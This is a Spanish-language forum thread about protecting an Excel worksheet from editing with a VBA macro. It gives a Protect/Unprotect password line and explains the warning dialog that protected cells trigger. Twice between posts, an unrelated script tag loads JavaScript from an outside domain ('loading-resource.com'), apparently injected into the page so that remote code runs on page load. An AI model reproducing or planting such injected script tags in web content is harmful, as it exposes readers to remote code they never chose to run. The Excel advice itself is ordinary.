Proteger Hoja contra escritura

Estoy haciendo una macro y quiero incluir que me proteger mi hoja para que nadie pueda escribir sobre la misma. Digamos que sólo puedan leer.

¿Cómo lo puedo hacer?

1 respuesta

Respuesta

Las sentencias que necesitas en tu macro para proteger la hoja son estas:

Tienes que sustituir el texto "nombre_de_hoja" por el nombre correcto de tu hoja y la palabra "contraseña" por la que tu quieras.

Esta misma sentencia pero poniendo Unprotect en lugar de protect sirva para desproteger la hoja

'...
'.....................
'...................
sheets("nombre_de_hoja").protect password:="contraseña"
'...................
'.................

recuerda finalizar la consulta

Y para que no me salga el recuadrito que sale que puedo hacer??

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Perdona no entiendo, ¿qué recuadrito? Ejecutándolo mediante código no aparece nada

Si perdona...

Un cuadro que sale de microsoft Excel que dice

"Las celdas que intenta modificar están protegidas y por lo tanto son de sólo lectura"

"Para modificar una celda o un gráfico protegidos, quite la protección usando el comando Desproteger hoja, submenú Proteger en el menu Herramientas. Puede que se le pida una contraseña"

Tal vez lo sea sii... Pero entonces no resuelve mi problema.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Claro, es el mensaje que sale cuando la hoja está protegida y le avisa al usuario que no puede hacer nada salvo que sepa la contraseña.

¿Es normal no?

De todas formas creo que se lo que te pasa. Esas sentencias tiene que estar las últimas de la macro justo antes de end sub. Las últimas.